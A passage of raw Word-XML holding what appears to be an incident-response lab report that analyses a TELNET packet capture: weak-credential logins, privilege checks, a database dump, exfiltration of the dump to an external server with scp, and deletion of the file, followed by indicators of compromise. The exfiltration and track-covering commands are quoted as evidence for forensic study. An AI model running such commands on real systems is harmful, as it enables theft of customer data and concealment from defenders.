          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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Right-click on one of the TELNET packets and select Follow &gt; TCP Stream.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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This will show the entire conversation between 10.10.1.2 and 10.10.1.3.</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639215"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="6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4004" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId118"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5943598" cy="363921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68.00pt;height:286.55pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId11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rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Look for:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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Usernames and passwords (transmitted in cleartext).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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Commands executed on the data server (10.10.1.3).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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Look for suspicious commands, such as:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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File downloads or uploads.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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Execution of scripts or binaries.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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Attempts to escalate privileges (e.g., sudo, su).</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1. TELNET Session Overview</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Source IP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10.10.1.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (web server)</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Destination IP</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10.10.1.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (database server)</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Port</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23</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (TELNET)</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Credentials Used</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Multiple login attempts were made with common usernames and passwords:</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admin/admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Failed</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administrator/password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Failed</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phl/phl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Failed</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phl/phl123</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Successful</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3589570"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="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93837" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId119"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5943598" cy="35895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68.00pt;height:282.64pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId11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Successful Login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6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successfully logged in as the user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with the password </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">phl123</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2. Actions Performed by the Attacker</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System Information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575110"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="6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46308" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId120"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5943598" cy="55751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68.00pt;height:438.99pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId120"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viewed system information, including:</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Ubuntu 20.04.3 LTS</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System load, memory usage, and logged-in users.</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IP addresses (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">eth0</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147.182.157.9</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eth1</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10.10.1.3</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Network Connections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530191"/>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29909" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId121"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5943598" cy="55301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68.00pt;height:435.45pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId121"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ran </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">netstat -atunp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to view active network connections:</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Open ports: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">3306</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (MySQL), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">53</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (DNS), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (SSH), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">23</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (TELNET), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">33060</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (MySQL X Protocol).</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Established connections:</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SSH connections from external IPs (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">142.112.199.247</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TELNET connections from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.1.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (web server).</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Sudo Privileges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550074"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="6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02340" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId122"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5943598" cy="55500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437.01pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId12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checked </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> privileges with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -l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user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can run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/mysql</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/usr/bin/mysqldump</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> as root without a password.</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MySQL Database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accessed the MySQL database as root:</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793542"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="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00274" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId123"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5943598" cy="57935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456.18pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId12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Switched to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 and queried the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table to view MySQL user accounts and privileges.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780850"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="6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067" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId124"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5943598" cy="57808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68.00pt;height:455.19pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId124"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Switched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and queried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which contains sensitive customer information.</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Dump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dumped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using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highlight w:val="none"/>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851756"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="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72632" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId125"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5943598" cy="58517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68.00pt;height:460.77pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId125" o:title=""/>
                <o:lock v:ext="edit" rotation="t"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>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826163"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="6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72720" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId126"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5943598" cy="58261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68.00pt;height:458.75pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId126"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sudo mysqldump -u root -p phl &gt; phl.db</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dump file (</w:t>
      </w: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contains the structure and data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File Transfer</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szCs w:val="24"/>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838867"/>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02038" name=""/>
                        <pic:cNvPicPr>
                          <a:picLocks noChangeAspect="1"/>
                        </pic:cNvPicPr>
                        <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId127"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5943598" cy="5838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459.75pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;z-index:1;" stroked="false">
                <v:imagedata r:id="rId127"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used </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">scp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to transfer the database dump (</w:t>
      </w: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to an external server (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">178.62.228.28</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scp phl.db fierce@178.62.228.28:/tmp/phl.db</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file was successfully transferred to the attacker's server.</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Covering Tracks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deleted the local dump file (</w:t>
      </w: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to remove evidence:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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rm phl.db</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3. Analysis of the Attack</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Initial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likely gained access to the web server (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.1.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) and used it as a pivot to access the database server (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.1.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) via TELNET.</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TELNET is an insecure protocol, and the use of weak credentials (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">phl/phl123</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) allowed the attacker to gain access.</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Privilege Escalation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user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had sudo privileges to run MySQL commands as root, enabling the attacker to dump the database.</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Exfiltration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exfiltrated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to an external server (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">178.62.228.28</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">), potentially for malicious purposes (e.g., selling data, identity theft).</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Persistence</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did not create any backdoors or persistent mechanisms in this session, but the compromised credentials (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">phl/phl123</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) could be used for future access.</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4. Indicators of Compromise (IOCs)</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IP Addresses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178.62.228.28</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: External server used for data exfiltration.</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10.10.1.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: Web server used as a pivot.</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10.10.1.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: Database server compromised.</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Credentials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Username: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">phl</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Password: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">phl123</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Files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Database dump exfiltrated to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp/phl.db</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:r>
